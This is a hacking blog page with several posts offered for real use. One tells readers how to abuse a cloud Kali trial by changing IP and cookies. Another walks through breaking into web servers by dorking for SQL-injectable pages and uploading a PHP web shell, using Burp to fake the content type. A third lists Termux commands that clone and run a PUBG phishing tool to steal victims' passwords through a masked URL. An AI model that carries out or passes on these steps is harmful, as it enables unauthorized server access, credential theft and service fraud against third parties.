AnonHacks

‎‎‎‎‎‎‎‎‎‎‎Hello Freaks,Anonymous here welcome to the blog 'ANONHACKS' ‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎

  • Home
  • About me
facebook Instagram Linkedin twitter

 

Hello there👋

First, go to the site and go through the registration. Be sure to set the item just interested 👇

Fill in the password, email, First name, Last Name, accept the user agreement and click Register. After registration, we follow the link that the site gave us.

Next, click the Join Queue button in this menu 👇


After that, in the Control panel, select kali 1.0.6 and after selection, click Switch On. 


Text step is to go to the Connect tab and click on the JavaScript VNC: VNC button (YOU SHOULD PRESS VNC).


Now we are transferred to the site, you need to click on the Other button.


Next, in the Username field, enter "root", click Log in, in the Password field, enter "kali" and click "Log in" 👇



⚠️Note : That's it, we have 14 days of free trial. For abuse, we just change the IP, clear the cookies and re-create the account.

If server overload try after sometime....

Congratulations, you are great! 

Thank you for your attention!

0
Share

 What is a Web server ?

1. A web server is a storage area, which in-turn a program,


2. That stores files ( web pages, CSS Scripts, images, java script files ) relevant to the websites in a secure folder. 


3. Control website and file access located in the server by the website users via the internet.


4. Control sessions and maintain file access details


5. Web server indicates both Hardware and software.


How Web server works ?


1.HTTP (Hyper Text Transfer Protocol) is used to transfer web pages from a Web Server to Web Client (Browser).


2. Web Pages are arranged in a directory structure in the Web Server.

3. HTTP supports CGI (Common Gateway interface).

4.Why HTTP is used in Websites - The reason is, HTTP supports Virtual Hosting (Hosting multiple sites on the same server).
How to Hack a WebServer ( Hacking / attacking server is illegal this article provides only a high level view for educational purposes)


Step 1
            Get the reverse IP of the target server goto the below link 
            https://www.yougetsignal.com/tools/web-sites-on-web-server/

Step 2
            Type the website name and press the check button. Automatically you are able to see 398 domains available in the below specified IP Address. All these websites are hosted in this server.


Step 3
            Goto bing search engine and type the ip address in the below format 
Ip: [ip address].php?id=

            The above search code will filter the searching in that specified ip address with the vulnerable web pages listed which got sql injection vulnerabilities.

Step 4
            We need to identify the page where you are able to upload any documents or images. If you found any pages with uploading options. That’s the root for us to enter into the web server.

Step 5
            Below is my blog where I posted to the web server injection script. We need to upload this script into the vulnerable website

Download shell.php file :- https://t.me/OnlineHacking/920

Step 6
            Copy the code and create a php file with the script taken from my blog. Am naming the php file as shell.php

Step 7
            Try to upload the script (php) file. Its throwing an error.

Step 8
            Now Open Burp Suite tool, in case if it didn’t work in windows environment. Prefer Linux environment (Specifically Kali linux)


Step 9
            This is the first page of Burp Suite tools. Click the next button

Step 10
            You will be moved to the next page. Click “Start Burp” button to start monitoring the user machine from which you are trying to upload.

Step 11
            Yes burpsuite is running in the back ground.


Step 12
            Now try to upload the php shell once again. Still its throwing error.

Step 13
            The file will get automatically cached in Burp suite. You can see the content type of the file. Change it to jpeg as shown in the below pictures and click forward button to go ahead.

Step 14
            The script is uploaded and the site consider it as image 12 a real hacking bypassing the upload validation Check out the path where its getting uploaded.

Step 15
            Goto the server path by typing the ip address and path where it gets uploaded



Step 16
            Yes you are into the server to do any kind of changes in the server. Your Web server is hacked.

Join my telegram channel for more HACKS
https://t.me/anonhacks 
0
Share

 

Open TERMUX and type these commands :

1. Update and Upgrade Termux App

pkg update -y && pkg upgrade -y

2. Install Git

pkg install git -y

3. Install Tool

git clone https://github.com/OnlineHacKing/PUBG-Phishing.git

4. Open PUBG Mobile Hacking Tool

cd PUBG-Phishing

5. Execute Permission All File

chmod +x *

6. Chack File

ls

 7. Tool setup Your Termux App ↩

./setup


8. Do you want to continue - Type y and enter


9. Install ngrok Your Termux app


10. Visit ngrok.com 


11. ✔ Sign up & get ngrok acthtoken 


12. Paste Your Ngeok Tokrn [ ex. ./ngrok authtoken 1ahJ************VoV ]


13. and enter to Complete Setup


14. Run ID Hack Tool Type : onlinehacking-pubg


onlinehacking-pubg


15. Accepted Notice


16. Boom 💥


17 . Choose any Attack - type numbers 🔢 and enter


18. Wait.......


19. Mask Your url here [ Ex. https://facebook.com ]


20. Use any Words [ Ex. free-coin ]


21. and enter


21. copy url and send


22. Start Attack to enter


23. View id password (DONE)

0
Share


0
Share


🔻 NAMES -


🌀Dnsdumpster :- dns recon & research , find & lookup dns records


🌀Verify email address :- Verify email address online using free email verification tool.


🌀ZOOMEY :- find iot device and bugs in android WordPress PHPMyAdmin and much more


🌀Search CVE List :- Common Vulnerabilities and Exposures (CVE®) is a list of entries — each containing an identification number, a description, and at least one public reference — for publicly known cybersecurity vulnerabilities.


🌀NATIONAL VULNERABILITY DATABASE :- NVD is the U.S. government repository of standards-based vulnerability management data represented using the Security Content Automation Protocol (SCAP). This data enables the automation of vulnerability management, security measurement, and compliance. NVD includes databases of security checklists, security-related software flaws, misconfigurations, product names, and impact metrics


🌀GREYNOISE :- GreyNoise Intelligence is a cyber security company that collects, labels, and analyzes Internet-wide scan and attack data.


🌀SEEBUG 1 :- You can find bugs here


🌀SHODAN :- Shodan is the world’s first search engine for Internet-connected devices. … Use Shodan to discover which of your devices are connected to the Internet,


🌀Website Vulnerability Scanner :- The Web Vulnerability Scanner finds website vulnerabilities like SQLi, XSS, server misconfiguration and many more. Use our Website Scanner to check your web security.


🌀Hack This Site :- HackThisSite! is a legal and safe network security resource where users test their hacking skills on various challenges and learn about hacking and network security. Also provided are articles, comprehensive and active forums, and guides and tutorials. Learn how to hack!


0
Share


0
Share
Newer Posts Older Posts Home

Follow On

  • facebook
  • instagram
  • Telegram

Search This Blog

  • February 2022 (2)
  • January 2022 (2)
  • June 2021 (2)
  • May 2021 (7)
  • April 2021 (12)
  • March 2021 (6)
  • February 2021 (4)
  • January 2021 (4)
  • December 2020 (2)
  • August 2020 (17)

Hidden WIKI

Search results

Translate

About Me

My photo
Admin
View my complete profile

Top 10 Reasons Why Python is So Popular and Why You Should Learn Python

  Every decade brings a new programming language that sweeps developers off their feet. One of the most popular and in-demand programming la...

Link List

  • instagram
  • Telegram

Popular Posts

  • [100% Worked] The easiest way to get Ultimate Express VPN for 30Days 1Month Trial
     Step 1:Go to this url Click this One and take one email something like begin with @email.edu.pl and copy it. Step 2:You have to go this u...
  • ⚜What is an ORM?
     ⚜What is an ORM?  🛡ORM stands for Object Relational Mapper. It allows you to create and manage your databases easily using models. 🔱A typ...
  • Hack WhatsApp By Sending a Link
     INTRODUCTION WhatsApp has become an important part of billions of people’s life. Many of us woke up or go to bed, by checking our WhatsApp ...
Copyright © 2019 AnonHacks

Created By Anonymous Shared By Ramkishore